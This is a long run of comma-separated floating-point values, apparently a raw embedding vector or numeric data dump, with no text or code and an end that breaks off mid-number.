-0.045238353,-0.002074412,-0.01452382,-0.019193204,0.001038498,0.03086071,0.018907761,-0.0032094042,-0.0036331753,-0.0023862508,0.015528795,-0.018579714,0.0021111995,-0.004373503,-0.00198451,-0.006247543,0.006042251,-0.019812979,-0.003302151,0.003989276,0.0087554045,0.03865733,-0.0006582119,-0.010883822,-0.009419353,0.013177226,-0.015114017,0.01697535,-0.008728351,0.013580069,-0.026592107,0.010606329,0.028994832,0.00837466,-0.015861627,-0.04223066,-0.015787704,-0.00908626,-0.04051934,-0.004838038,-0.000709688,-0.0028147462,0.0048383917,0.0048882877,0.03501442,0.009282971,0.031474486,-0.015260443,-0.010998796,0.013734779,-0.021977577,-0.019673795,-0.03794312,0.0020609673,0.005874855,-0.029509254,0.0064126425,0.01666788,-0.012127579,-0.004126053,0.029303957,0.0045137308,-0.01094318,-0.004949541,-0.019133503,0.009173529,-0.0021746706,-0.016571054,-0.0036156382,-0.01576704,0.013477697,0.011141827,0.015043907,0.018141815,-0.014344856,0.03806305,0.016746944,0.0023081142,-0.005683192,-0.018310308,0.0006538494,0.019396322,0.004951762,-0.0005384901,0.0087533,-0.020985775,-0.009981863,0.011307246,0.04096601,-0.016100839,0.0068552247,0.004697216,0.012349187,-0.015398646,0.028088637,-0.004727221,0.011246878,0.004678453,0.0077382824,-0.0048111053,-0.0018382813,0.020485101,-0.025251025,0.0074244663,0.01043195,0.038973916,-0.001265053,0.03679919,-0.008295266,-0.010543398,0.002555859,-0.005074592,-0.0073569063,-0.011574888,0.00021514628,-0.0044027856,0.023140935,-0.0007087085,-0.013249811,0.0019431417,-0.025914127,-0.0011057227,-0.010349574,-0.017914088,-0.016978208,-0.0042495895,-0.0050295093,0.0025143558,0.033434015,-0.00882388,0.036290143,0.009942381,0.03087646,-0.013304981,-0.019954622,-0.009161421,0.0034395242,-0.04554958,0.02229103,0.009869157,-0.010002758,-0.010586289,-0.025747849,-0.0030998234,-0.0058397637,0.029510636,-0.013501254,-0.016111614,-0.019402627,0.029781856,-0.009704323,0.010982812,-0.0010708015,-0.013383168,-0.031152451,0.01992103,0.022562383,0.01644294,0.0066855378,-0.0038881593,0.0021780238,-0.0056851227,-0.009979982,-0.025171645,-0.025893318,-0.012177868,-0.010877489,-0.007658486,-0.006334493,-0.019317487,-0.0073130527,0.0002678513,0.0032568993,-0.0024081597,-0.00893341,0.0060236957,-0.022909457,0.017415388,0.007937256,0.00007398906,-0.01466463,0.006684259,0.011540935,0.015129711,-0.010364201,0.0013342651,-0.02664501,0.005363927,0.011375963,-0.040388554,-0.011432255,-0.014978478,0.010658932,0.00982091,-0.043628767,0.017280426,-0.01985612,0.0144054135,0.0072755036,0.011749059,-0.0009871585,0.0013001859,0.0028615147,0.017141879,0.022953354,0.00805284,-0.025294134,-0.0033646452,-0.011646713,0.008414312,0.0020913123,0.0066591953,-0.022137444,0.018351736,0.002480459,-0.007880269,-0.010643478,0.0015025268,0.013138159,-0.01257514,0.0040579545,0.004413393,0.017737083,0.008193411,0.004307154,-0.013142762,0.013850809,-0.00040730077,0.01672577,-0.014672507,-0.007893444,0.0042084754,-0.036039725,0.007772658,0.002256712,-0.030111387,-0.000038391947,0.014591503,-0.011669149,-0.026558222,-0.00007368041,0.02360245,-0.0044027017,-0.004549296,0.012164464,0.009773523,0.018783504,-0.004215269,0.0071182544,-0.02346252,-0.018529136,0.027218495,0.024060603,0.0055081667,0.0063224994,0.0020075857,-0.0039347326,0.0024508692,-0.011602579,0.0092997085,0.017956845,0.009661693,0.011715307,0.010364924,0.0032683758,-0.039155677,-0.0019216602,-0.009682108,-0.003660721,-0.0045912224,0.008566992,-0.015570342,0.010014735,-0.0041186265,0.034844175,0.0134732565,0.01810269,0.017135076,0.019257791,-0.0064677247,0.021402674,-0.00391422,-0.004025558,-0.004728827,-0.0022779766,-0.02902176,0.025054503,0.0058028973,0.0055419924,-0.024499226,-0.0022267038,0.0028231794,0.028650625,-0.018903462,0.0022203235,-0.0065296288,-0.0020212536,-0.015124602,-0.0038714379,0.06987139,-0.0032584239,-0.034309037,0.0041939877,-0.014779695,-0.024542617,-0.0038196621,0.00798789,-0.009650515,0.020304643,-0.0027391207,-0.00987497,0.00227303,0.022880739,-0.0048051216,-0.0092666615,0.022857234,-0.0046983855,-0.010716745,0.004256344,-0.002886144,0.0028505095,-0.0063788593,-0.01798517,-0.039960153,-0.02057022,0.029962126,-0.0005990276,-0.0065662023,0.007890639,-0.014667021,0.005301,-0.014963337,-0.0015457587,0.025210466,-0.000040330382,-0.0032380593,0.005885179,-0.017351188,-0.008106731,0.023383059,0.001807404,-0.000882944,0.00935187,-0.007360073,-0.021355044,-0.016523452,-0.0023906287,-0.0066356855,-0.0027674015,-0.019833706,0.018214304,0.025085049,-0.020983925,-0.013848951,-0.012458489,0.0107014645,0.013191095,-0.02102898,-0.009521685,0.022323074,-0.003390673,-0.018427785,-0.0063277287,0.005734902,-0.0088300025,0.012610313,-0.018708587,-0.0036782948,-0.0061133783,0.017384853,0.0068295295,0.025501005,0.0032201712,-0.011239976,0.008780823,-0.0025756985,0.024012877,0.015063249,0.008147464,0.0023053268,0.023443365,0.00041353938,-0.00045050023,0.023113865,-0.008343607,-0.0139546245,0.014356197,0.020915987,-0.008443454,0.031701498,0.021911176,-0.01086481,-0.010951817,0.015443707,0.019405209,0.0064672013,0.013271172,-0.0031441734,0.0058293953,-0.023308419,-0.008094583,-0.021236295,0.019154828,-0.0053282734,-0.0034066385,0.0036111085,-0.008010915,0.030760398,-0.00025507767,-0.006476618,-0.0555956,0.021768792,0.023565495,0.034741186,-0.012078268,0.043175478,-0.000530145,0.00379624,-0.0071327942,-0.014717852,-0.005490182,-0.0014231133,0.013694891,0.0005987939,0.020519089,0.016395427,-0.027193302,-0.010680949,-0.012043721,-0.053510472,-0.010716403,0.022079807,0.00038539554,-0.0048696124,-0.000037966096,-0.0069426014,0.006231981,-0.0021008633,-0.008266819,-0.0046605794,0.0028411227,-0.0011793445,-0.00051709404,-0.009735112,-0.016849542,-0.011459075,-0.00021520119,0.015075116,-0.01041048,0.0054932926,0.016037295,-0.023826368,-0.017662615,-0.009035985,-0.021061497,0.015420776,-0.01182519,0.009341333,-0.030784959,0.008416004,0.012783077,0.008106218,0.0059902347,-0.012046587,0.0063416637,-0.0091326125,-0.009821937,0.025085064,-0.0188329,-0.004990734,0.013283373,0.01779453,0.005538568,-0.021366656,0.011184259,0.00034765917,-0.011108687,-0.020058844,-0.008334228,0.033966366,-0.004400013,0.027859043,0.025335532,0.008804557,0.017566511,-0.0011811614,0.008102865,0.01083172,0.015244944,-0.006459457,-0.00948841,-0.021070635,-0.012112545,0.026972977,0.0071556433,-0.008968699,0.008478213,-0.0077024926,0.015281901,0.0007442101,-0.0071505886,-0.025745718,-0.017522221,0.006519102,0.00045620004,-0.0059828646,-0.019730804,-0.022118183,0.010444247,0.008162984,0.030541953,-0.010052342,-0.0064863414,-0.011080022,0.0074149854,-0.0007888885,-0.011737316,0.006721133,-0.0142025985,0.020768102,-0.021600893,0.032800745,-0.00068585406,0.015042964,0.0040265373,0.012875029,0.006344513,0.021322602,0.0026163366,-0.02335047,-0.003420631,0.025741648,-0.0055455295,-0.010714085,-0.014003853,0.021063808,-0.00669393,-0.016029358,-0.0016681077,0.025138985,0.020927824,0.0030191978,-0.019186841,0.0072637494,-0.01094465,-0.015469412,-0.007090444,-0.0051756683,-0.018319052,-0.011163412,0.00007021283,-0.024599914,-0.0034741696,-0.010209318,0.027791161,-0.001536356,-0.0009823213,0.0046060462,0.0013873746,0.003339861,0.017138062,0.0021485223,-0.02295272,-0.021176022,-0.016287131,0.03846793,0.008860635,0.006656875,-0.027070003,-0.004947797,-0.021968206,-0.01443302,0.005688904,-0.011623892,0.015511007,-0.0041905274,-0.04901277,0.02671925,-0.020079471,0.008923834,0.017150257,-0.006192555,-0.014460035,-0.010723585,-0.016031409,-0.0032752433,-0.019284287,0.008943386,-0.0017170999,-0.022092288,-0.00091867906,-0.018808287,-0.028381916,-0.00057807716,-0.02095526,-0.0007450188,0.023337197,-0.016099399,0.010934335,0.022982417,0.001055793,0.004256954,-0.0014467536,-0.02697927,-0.00820363,-0.0007567018,0.012589958,0.004736465,0.015279483,-0.024379853,0.030470073,0.009285635,0.008450865,0.016936647,0.004009645,0.0019306694,-0.008112789,0.026046278,-0.0051580057,-0.022653323,0.02057465,-0.013060431,0.012221583,0.010753907,0.00081207446,0.0016072544,0.003029879,-0.004355718,-0.011088575,0.007203097,-0.003227791,0.0014203812,-0.022109088,0.009054892,-0.0113125965,-0.003297308,-0.0018631396,-0.005327588,-0.016398862,0.028745728,0.0143067725,0.02023271,0.00039719482,-0.012971368,0.010126317,-0.016501434,0.0071395733,-0.01042256,-0.004966257,0.015067439,0.0000036101176,-0.016684216,-0.0040631336,0.014611049,-0.0011084802,-0.006125376,0.007211892,-0.011616246,-0.021770054,-0.015949102,0.0025620372,-0.025438156,0.0035795101,-0.015500946,-0.010953992,0.017932992,0.0012821534,-0.003346244,-0.007962823,-0.018523687,-0.01561261,0.023705704,-0.0054861703,0.0025085406,-0.025797613,0.0048642107,0.013340921,0.01124344,-0.010639858,0.008466195,0.003888695,0.031361595,0.0083499625,0.030200573,-0.0008923444,0.015548704,-0.028996577,-0.0063957064,0.017910402,0.010119519,0.01159232,0.03244338,0.011507171,-0.01426535,0.016113771,-0.038009148,-0.0060854647,0.01562573,0.00022536628,0.001884957,0.008206559,0.01324923,0.0010084052,-0.00519081,0.020925099,-0.0037911884,-0.06334557,0.00094643387,0.03552341,-0.0014786763,-0.0006399883,0.01834083,0.018781357,0.012412673,0.020045169,-0.007299041,-0.009317779,0.004912203,-0.005339191,-0.005175776,0.00015582138,-0.013517573,-0.008459135,-0.002478619,0.023893975,-0.0012785926,-0.0039293794,0.009674365,-0.009107737,-0.0040910253,0.011868389,-0.015325271,0.009940084,0.032496646,0.008095978,0.020991787,0.012281361,0.015436365,-0.005001686,0.002253739,0.014752421,-0.024678154,-0.0026884885,0.0044067344,-0.015085342,0.0009016859,0.0075637344,-0.012193772,-0.02672752,0.019756403,-0.0155581115,-0.009169716,-0.025064707,-0.01827615,-0.011007956,-0.03398537,0.019698266,-0.019465558,0.005075996,0.021649264,0.009589255,-0.0009263275,0.005964578,-0.009082043,0.0014047326,0.00090627914,0.004302134,-0.00527485,0.0015124402,0.03496749,-0.006105722,0.0044634016,0.0030384155,-0.021459715,0.019545306,0.0011852292,-0.019036226,-0.010559259,-0.013487417,0.01517803,0.007793368,0.043982904,0.025620613,-0.011390117,-0.0053729503,-0.017649341,-0.0044998988,0.015068641,-0.00069087103,0.0071849697,-0.04108344,0.011957401,0.0017777408,-0.022082254,-0.000005454212,-0.008771263,0.0049679116,-0.007543632,-0.005222559,0.00216515,0.006681434,0.056741558,0.01486555,0.020553134,-0.007093691,0.018727748,0.003035572,-0.026095957,-0.005039436,0.017631026,-0.014992754,0.00018457687,-0.017159171,-0.012930769,0.0118852025,0.014972973,0.022342674,-0.012803729,0.006559894,-0.00767469,0.023565438,-0.03073051,0.000440556,-0.007305418,0.029936826,0.01333935,0.0070913695,-0.021048732,0.008371663,0.01824852,-0.007895137,0.0001562533,0.006789645,0.012222868,-0.018951353,0.032066114,-0.010448273,0.009960338,-0.000708952,-0.0070327716,0.0048717777,0.012844466,0.01935223,-0.01024528,-0.012078479,0.011691973,-0.0072414167,-0.0073697357,-0.022054475,-0.0006805579,-0.005659275,0.00083323644,-0.00863171,-0.0019432715,0.0018987043,0.02290186,0.0067567807,0.012268526,-0.007838034,-0.0027054048,-0.010743167,0.0045181955,0.0012297847,-0.012519579,0.007466618,0.019850567,-0.010653315,-0.023949303,-0.0069838148,-0.0041130707,-0.028446298,-0.0087459,-0.018007986,-0.008025488,0.015165251,0.004817884,-0.0013760162,-0.00076077785,-0.0010070584,0.007241333,0.0119854305,0.018074905,0.019923093,-0.0087959105,-0.0035882764,0.016465314,0.022780491,0.03565082,0.0052551483,0.021013735,0.0024484808,-0.027918594,0.0050689266,0.006249452,-0.027440721,-0.025013892,0.00072879705,0.025153898,0.0107504735,0.0025128855,-0.0065372377,0.0098042935,-0.002903406,0.014483443,0.010054655,0.0087605305,-0.020774527,0.027983977,-0.0019594906,-0.005375366,-0.024106402,-0.021817625,0.0067959353,-0.0067511876,0.0041905795,0.0016707835,-0.011498849,0.014956306,-0.034586143,0.02295336,-0.02035253,-0.0058827554,-0.020897785,0.0076408433,0.0106579615,-0.014499479,0.030217472,0.0044488027,0.008821866,-0.0075033857,0.015896706,0.0061284294,-0.0147005245,-0.0026543988,-0.011812737,0.012176804,0.026534326,-0.025697261,0.02888962,0.026898028,-0.02309643,0.02122707,-0.0108212605,-0.0076024835,-0.004969456,-0.03962253,0.0066025117,0.026054876,0.011328478,0.0124041885,0.0068206,0.026006294,-0.005350101,-0.0027549865,0.006543268,0.021778435,0.0013229162,-0.025467897,0.015933031,-0.00884427,-0.023062387,-0.0056588133,0.0020005098,-0.023738977,0.0074582896,-0.0018109608,-0.0023184808,-0.008388666,-0.0038419086,0.014616108,0.022149134,-0.028519971,0.036200512,0.014878026,-0.0029281173,-0.017523535,-0.0023749294,0.0037999307,0.024439285,-0.020044988,0.001161425,-0.02542359,-0.021890648,-0.004153395,0.018853817,0.0050967145,0.007935675,0.006381332,0.00446724,-0.016909983,0.0033589215,0.0053196284,0.012632344,-0.03108545,0.025201142,-0.00482717,-0.0002502022,0.010902394,-0.020954661,0.0053522964,0.019802803,-0.0305196,0.017074192,0.0064872005,0.00096422614,-0.0010547971,0.0054539912,-0.0059107477,-0.019199656,-0.018319286,0.0035044856,-0.0007031427,-0.011245416,0.008549387,0.017625611,-0.0039368295,-0.019968832,-0.018161625,0.007660008,-0.032928854,0.0031901095,-0.038552124,0.0036473896,-0.0019073081,0.0017061593,0.0034904142,-0.009705437,0.0039883326,-0.014943951,0.007029431,-0.0032532597,0.03348364,-0.0027425946,0.0024875281,-0.02566648,-0.0018629275,-0.005066393,-0.023243846,0.0018060354,-0.004380787,0.014811555,0.0011462605,0.0005682356,-0.003333513,-0.0025824548,-0.0069175046,0.025576908,-0.018578198,0.083547674,-0.0011136895,0.015200904,-0.006944901,-0.0072287945,0.039190143,0.029758433,-0.019007409,0.025613114,0.0048636505,0.0032179856,0.0075933295,-0.016515462,0.025415158,-0.005775979,0.008072996,0.0098695075,0.007717178,0.009595291,0.0064052087,-0.012415838,0.008023677,-0.0017157833,-0.026369514,0.0030479932,-0.023065576,0.029311843,-0.018392062,-0.021310719,0.0036471416,-0.004898345,0.0073615047,0.0009910659,0.009123148,0.03218085,-0.03299237,0.006470057,-0.01676903,-0.012277743,-0.023706522,0.023059705,-0.0024260478,0.017601341,0.0031953224,0.023022672,-0.0023557849,0.08086117,0.011144774,0.030100925,0.008740038,0.015190175,0.005137592,-0.0013693853,0.008132311,-0.02156963,-0.018731931,0.013215163,0.028155576,0.018748015,0.008710911,-0.011686884,-0.0029826344,-0.023711737,-0.007443944,0.009396628,-0.004226352,0.01750478,0.0006531918,0.0066620284,0.003689179,-0.034516525,0.021425858,0.018785933,0.009486641,0.032973185,-0.0093968855,-0.011923544,-0.026787397,0.02518665,0.019900948,0.014241155,-0.062822476,-0.011499056,0.2525112,0.004641048,0.014950508,0.033031654,-0.0037067116,-0.00043866687,-0.12162226,0.01764714,0.0056289216,-0.016786216,0.0036784073,-0.014486395,-0.022441873,0.003909181,0.014346927,0.03259733,0.022643821,-0.014669761,0.027080543,-0.01373101,0.010107662,-0.0021545766,0.0018249917,-0.00039884946,-0.026513716,0.0043448857,0.024594614,-0.008576,0.00056107907,0.009360804,-0.01269084,-0.0077806786,0.018121406,-0.016930318,-0.039142482,0.011618359,-0.004140874,0.0132610025,-0.017764095,-0.026361158,-0.0029521517,-0.0006795851,-0.026691036,-0.025164919,-0.16176178,0.013238342,-0.008787538,-0.035193626,0.024127536,0.02024079,0.015415314,-0.003736433,0.008294606,0.0013985881,0.015107042,-0.0017206739,-0.00040403727,0.018138044,0.000028180875,-0.003993824,-0.010886357,-0.00031661463,0.00201306,0.0042617433,0.009688783,0.017466255,-0.017835513,-0.033276778,0.0071805036,-0.0015488663,-0.026750775,0.004462058,-0.017857896,-0.00097565976,-0.021791365,0.00449945,-0.019165982,0.0067659826,-0.026043553,-0.016675824,-0.0042726574,0.010507357,-0.0212229,0.017714927,-0.0035473907,0.0034571155,-0.012033316,-0.0025315501,-0.00031227682,0.023128498,0.026367698,-0.013311641,0.016734675,0.0029462997,0.01746429,0.008455166,-0.020492997,-0.011083702,-0.00452523,-0.008414582,-0.011218038,-0.0069169533,-0.008371258,-0.005369566,-0.005551941,-0.01766942,-0.031170072,-0.019718492,0.011465461,-0.0126438625,-0.012237748,-0.018232254,-0.0026219825,-0.0077407765,0.00059322314,0.008345141,0.0068028066,0.004539218,0.023116574,0.02380257,0.003793103,-0.009222605,0.0036743253,0.00093628746,-0.030870643,-0.015848715,-0.011171806,-0.017185766,-0.0022919308,0.007932901,-0.009401216,-0.0009722658,0.005387102,0.0018163734,0.014119852,0.016510936,0.01898708,0.03387856,0.0067230496,-0.016739884,-0.00055793923,-0.013804382,-0.0134432325,0.011338367,0.0034733226,0.011897835,-0.005709206,0.002309524,-0.0093997745,-0.0025831691,-0.0014090001,-0.021407945,-0.02121398,0.010745719,-0.019366078,0.007923865,0.000019517816,-0.01426223,-0.019918252,-0.03370159,0.0061714225,-0.011896341,0.007040179,-0.011532301,-0.005331688,-0.03028891,0.0040020267,0.0005563574,0.027475914,-0.004273422,-0.0051713325,-0.0028437239,0.0058576297,-0.027186625,-0.0070666745,-0.0040000924,-0.0051332624,0.0032561761,-0.011774234,0.012617271,-0.009844384,-0.026229719,-0.03832012,0.020944046,0.015764423,-0.0050273724,0.006396591,0.0050440785,0.007390654,-0.0074267904,0.0063218144,0.0033904319,0.016974598,-0.014992457,-0.006146034,0.031643726,0.012436916,-0.026287824,-0.024881441,0.097500585,-0.0016716429,-0.017306477,0.023293804,-0.015392825,0.012658885,0.031766083,-0.0093063675,-0.0070701204,-0.017593479,-0.026241207,0.0017560126,-0.016774736,0.017476209,-0.011246668,0.016914202,0.029881641,0.012141885,0.008195697,0.0020126314,0.009790368,-0.008871035,-0.009377258,0.022225026,0.022417983,0.0008717372,0.0024521474,-0.0013467034,-0.008094147,0.0029296377,0.0130820675,-0.00034962437,0.0015055732,-0.01685043,0.033583034,-0.043228623,-0.0255843,0.0010964077,-0.004289186,0.025769081,0.007875269,0.007986121,0.009649585,-0.033729814,0.019349538,0.0017708321,-0.0026711402,0.00023946022,0.010517999,-0.0035938963,0.0054527577,0.025055462,0.00043873262,-0.01958754,-0.008397599,-0.006024091,0.00615694,-0.01778565,0.0069022756,-0.009736122,0.03760983,-0.0025220548,-0.0063445996,0.0004133588,-0.0077478187,0.0015567485,0.013074138,-0.014385912,0.0034380995,0.032904126,0.0005923176,-0.025871538,-0.0029313413,0.019726926,-0.007847706,-0.020145139,-0.008495416,0.006069441,-0.02205562,-0.022100465,-0.008396865,0.01710673,-0.005791993,0.016724983,0.0043683965,-0.06114877,-0.00046901283,-0.011884117,-0.0080046,0.026593337,-0.01197551,0.0144637255,0.018686522,0.000018959216,0.013394211,-0.004250077,-0.011255488,0.0068864035,0.0072473157,-0.0040356773,-0.020055087,0.012631657,-0.007954463,0.000099118086,0.00044559635,-0.029204754,0.0023325828,-0.017120091,0.0060076606,-0.006332086,0.0033148308,0.006531038,0.024172187,-0.007538949,-0.00807715,0.028262762,-0.027351363,-0.015859317,-0.002201201,-0.0013377629,-0.01053298,-0.007411572,0.014647306,0.007433982,0.002572208,0.0003871782,-0.013142711,0.017094404,-0.015611568,0.014244429,-0.017855117,0.03427531,-0.028270185,0.02232434,0.0035335354,-0.0062881005,0.010213933,0.021860737,0.00997759,0.003857802,-0.014609876,0.012033247,0.008474342,0.005242845,0.0020499104,0.0035994472,0.00812969,0.0018380398,-0.017433813,0.0032207104,0.004675296,-0.01834496,-0.002075209,-0.010607948,-0.0003565713,-0.012636967,-0.02816627,0.0027368327,0.0011325874,0.017923305,-0.021350332,0.011889244,0.011620688,-0.009198988,-0.023400288,0.042898603,0.01291719,-0.007062431,0.029519726,0.0007470569,-0.016358763,-0.024237793,-0.0025982563,0.014405251,0.0041616024,0.013889462,0.011431767,0.003746106,-0.014329915,-0.012524648,0.024816444,0.009942537,-0.03626218,-0.003697439,0.020522218,-0.022866787,-0.00896622,0.027741572,-0.0048008375,0.0036982386,0.003586132,0.0075938357,0.0317722,-0.015563467,0.0061635072,0.0010169799,0.0035936704,-0.014442809,0.00646666,0.0054296185,-0.005771346,0.024264444,-0.024009857,-0.028694646,-0.02222132,0.005942482,-0.022139607,0.004216506,-0.025459122,0.0056303674,-0.0065197726,0.026971167,-0.0063398387,-0.020411866,0.024774378,-0.0064581363,-0.001986604,0.007057507,0.0056545534,-0.0050146263,-0.0015698026,-0.011690598,0.0068327305,0.009376979,-0.042077452,0.0037908093,-0.009280998,0.0789054,-0.010133931,-0.012517174,0.02390315,0.018522643,0.014538295,-0.011052867,-0.0047360337,-0.014213151,-0.00082176336,-0.008256255,-0.033759102,-0.0102304565,-0.0067639872,-0.0027974523,-0.015962413,0.018483495,0.025620336,0.0040976736,0.014433737,0.0013817291,0.019553922,0.019924035,0.017775128,-0.01667486,-0.02834521,0.01215708,0.00004390508,-0.0025033646,0.0017301643,-0.0016208587,-0.008837322,-0.02295,-0.0052574323,0.004674667,0.0129957255,-0.00244699,-0.0166357,-0.020675166,0.020092955,0.019265864,0.0009009423,-0.0022505843,-0.0019766826,-0.00068349054,-0.016738312,0.022135975,-0.025748044,-0.0068283016,0.004323973,0.0059502195,0.034425315,0.0032975003,-0.054291863,0.00070477993,0.001721183,0.00082162267,-0.017502176,0.020883504,0.0047841985,0.00537956,-0.00809607,-0.011265779,-0.008931605,0.022530572,0.04006493,-0.0051841624,-0.018953057,0.007038039,0.014042176,-0.0014784287,0.0071705477,0.004147211,-0.004217705,-0.006402538,-0.011255825,-0.00019263914,0.0066537005,0.037194286,0.006482257,-0.0022407572,-0.0066470634,-0.004153573,0.0070206355,-0.019154297,0.022623815,-0.020871326,-0.010054497,0.0054374,0.0055199554,0.029422075,0.025168698,-0.010236214,-0.007895379,0.023316145,-0.0074433126,0.008397163,0.0051671527,-0.00011803434,-0.019420419,0.0001457309,-0.016843094,0.0009813925,-0.007863166,-0.0032963203,-0.012359347,-0.09610571,0.021701174,-0.016504843,-0.014143094,-0.01573115,-0.0077530737,0.022101425,0.07434535,0.009966271,-0.010889549,0.0077080494,0.01073079,-0.005152227,0.0015093879,0.007713568,0.015242218,0.0088101365,-0.005776465,-0.006971395,-0.003981197,0.026087206,0.015969932,-0.025033968,-0.015524887,-0.006897659,0.00658234,0.00714073,0.0018942868,0.023159131,0.016601307,-0.016506866,0.0031008574,0.008023876,0.0053566247,-0.016186483,0.006167453,-0.02953652,0.0130298855,0.00054549787,-0.007968915,0.0005960342,-0.0007848171,-0.008243075,-0.0052912305,-0.025791747,-0.001348574,0.015113809,-0.008388158,0.043500066,-0.015043327,0.0108414795,0.0008542656,0.0306107,-0.017871283,0.0008711264,-0.02661909,-0.021241784,-0.0018524757,0.016499428,-0.031610705,0.019991964,0.036571376,0.013590322,-0.032534342,-0.016345588,0.008167491,-0.0006509339,-0.020884706,-0.009743093,-0.00091813266,-0.002142503,0.003806816,-0.006650307,0.0053790617,0.0031099843,-0.012063074,-0.003788963,0.007844132,-0.012802797,0.013919799,-0.007010648,-0.008411385,-0.01093349,0.009005511,0.001375594,0.0112489,0.0053711254,0.0024110493,-0.028541438,0.0036187705,0.011242956,0.017208017,-0.015428063,-0.023575492,-0.016367229,0.0067735426,-0.0027760658,0.018315416,0.022171263,-0.0041690823,0.011569348,-0.006486292,0.0068630404,-0.016113332,-0.14868236,-0.018358912,0.012419416,0.009135574,0.018406752,-0.018981699,-0.008212928,0.0004024438,0.009643109,-0.015277545,0.0023634161,0.0076180184,0.037962712,0.022722393,0.00895055,-0.009003905,-0.0132659115,0.012213438,0.001348303,-0.011983534,0.0041302573,-0.002552291,-0.026688071,-0.0008202939,0.0395687,-0.007291928,-0.012273099,0.008080982,0.0038033787,-0.008138001,0.0042331875,0.013973475,-0.0034395445,-0.021724721,0.00084656244,-0.03951949,0.029048879,-0.001489511,-0.0068751797,0.017353209,0.024535881,-0.0072473083,0.0046339207,0.018097464,0.015433851,0.0048852754,0.017517209,0.0029179642,0.03396232,-0.00039666452,0.009022844,-0.0025704647,-0.0406382,0.003830124,0.007915779,-0.014728638,-0.021588773,-0.014985082,-0.014765369,0.0067773103,-0.013589918,0.010031525,0.008538789,0.000087407316,-0.0146635845,0.017578166,0.012598634,0.005270418,0.012216391,0.019407326,-0.017019065,0.014778547,0.031272158,-0.03164736,0.015565619,0.01313873,-0.010919847,0.040622365,0.030103711,0.007255291,0.01346239,0.006919657,-0.0038660455,0.013491194,-0.008947861,-0.0011099728,-0.001451462,0.019571347,-0.004601838,0.031554673,0.017644055,0.034140993,-0.024395432,-0.0023012077,0.03129202,-0.0017140289,0.0088376,0.0102086235,0.0076152384,-0.0001614862,-0.028600127,-0.02221315,-0.015229602,0.008852693,0.0040779454,-0.011053404,-0.013506987,-0.018998573,-0.004790959,-0.0003767733,0.0076736957,0.036187008,-0.022639325,0.013111194,-0.019598212,-0.0075420216,-0.0060608033,-0.008190253,0.0009839609,-0.00009502436,-0.00565383,0.01139126,0.011629423,0.00025981362,-0.027719857,0.0032340821,0.0033468101,0.025531769,0.0071294405,-0.019071156,0.004224053,0.0068257106,0.01041401,-0.030896746,-0.0034490556,0.011139023,-0.009823449,0.0032904109,0.0063772816,0.00280011,-0.0109890085,0.006409853,0.022534512,0.032953925,-0.0020822857,-0.018290607,0.0018187743,0.016385464,-0.00554828,0.0060029845,-0.0006804114,-0.0019464446,0.008131074,-0.015293465,-0.002386337,0.0098952595,-0.01854105,0.0053494745,0.024147186,0.004743396,0.016489109,-0.0038034904,0.022681551,-0.010685637,-0.004557746,0.016413307,0.014210044,0.013596757,0.0059974296,0.016526729,0.0030476279,-0.006715017,-0.0016197072,0.024414841,0.008995753,0.04282039,0.026707385,0.032006036,0.005601794,0.01746564,0.023210227,-0.0018771745,-0.016498022,0.006734693,0.004262682,0.0028456189,-0.008939472,0.011168265,0.0033609709,-0.012735665,0.020547342,0.001508697,-0.010436548,0.005100109,0.0019389244,0.0016560582,-0.006830624,-0.0114781745,0.014294934,-0.045994032,-0.003662752,0.036686677,-0.011503073,-0.0076999487,0.0045949197,0.016896812,0.002770286,0.029905021,0.0046413103,0.005483406,-0.005483739,-0.023471018,0.017088065,0.039168254,-0.0015554924,0.010062332,0.0050890087,-0.013075205,0.012048742,-0.016708622,0.0041433186,-0.011415541,0.022761155,-0.0124072125,-0.0026238293,0.02277649,0.021233378,0.023956422,0.007780306,0.009176445,0.014929335,0.0045717214,-0.0060152877,0.024603,0.014488959,0.009072106,0.016991222,-0.0015447839,-0.009484426,0.0076020965,0.00947654,0.021410218,0.02393717,-0.013128953,-0.01668865,-0.008473735,-0.00043834042,0.002070304,-0.014663794,0.011850105,0.012441383,-0.016775243,-0.008199827,-0.011555749,0.0073628323,-0.004897399,0.032387003,0.0015390333,0.0007892191,0.0068107513,-0.016549265,-0.022445548,0.000036590678,0.017705975,0.004159977,-0.02104853,-0.0030569145,-0.046500526,-0.0036196304,-0.0044359956,-0.0078716185,0.014984165,0.016063636,0.022399431,0.0016789864,-0.009066128,-0.03295522,-0.013136401,0.014568806,0.0044724387,-0.004725684,-0.017003339,-0.018972425,-0.03334138,0.0014947191,-0.0128726885,-0.015271176,-0.008819799,-0.007069089,0.0041557415,0.02342765,0.007545892,-0.0114875,-0.033609904,-0.026549125,0.0027236135,0.019208351,-0.004858466,0.0017061202,0.00049282704,0.011708366,0.011141299,-0.0053322143,0.02458357,-0.016183315,-0.0005024933,-0.00979955,0.010458046,-0.01618919,-0.0026373768,-0.01150666,0.015582321,-0.00779444,0.012739553,-0.0032208015,-0.0030631025,-0.018976578,-0.0061622337,-0.016684238,-0.008649197,0.00015778697,-0.027912384,0.013710558,0.0016408019,0.010847806,-0.007489861,0.014239276,0.010204904,-0.002072881,0.009282696,0.019744549,0.015234494,-0.030515615,0.0017833782,0.007842011,-0.010547484,-0.01941583,0.013489003,-0.001887059,0.026481112,0.007745962,-0.00032514342,-0.0066027623,-0.043495204,0.01949084,-0.011133144,0.0027844636,0.007131776,0.024869671,-0.0107326135,-0.016478624,0.0053755576,-0.0007691603,0.020700715,0.0006335573,-0.003438067,-0.015951805,-0.00063725054,0.011817706,0.022152448,-0.031493884,0.00034907955,-0.0008784882,0.0035309885,0.0069446573,0.004800473,-0.0066782944,0.008341718,-0.004456959,0.003968438,0.004897544,0.0030643938,-0.012294176,0.00402687,-0.025873877,-0.06314317,-0.00027776428,0.021480272,-0.026031528,0.03617747,0.011232999,-0.024791095,-0.015477507,-0.016629789,-0.006316854,-0.0057589333,-0.004388477,0.0001877663,0.027774414,0.020725843,-0.0077642854,0.008557163,0.0040921452,0.031512626,0.014246961,-0.013849866,0.035498794,-0.007124309,0.011637182,0.005875324,0.0009473621,-0.011290959,-0.014280705,-0.028800253,0.009109007,-0.02169444,-0.005335467,-0.0054005533,-0.0021924207,0.000049919963,0.013611427,-0.0033600058,0.017476888,0.019885812,-0.008721352,0.0040269285,0.0118554365,0.01150915,-0.013099122,-0.0014295727,0.03157458,-0.012102361,-0.025725167,-0.0072024367,0.006760223,0.017606324,-0.0073220977,-0.0075908024,0.0056938743,0.0094854,0.02776715,0.017868795,-0.002823098,0.024455257,0.0019924287,-0.004607508,-0.0076096486,0.0077697393,-0.014530509,-0.001813133,0.031042214,-0.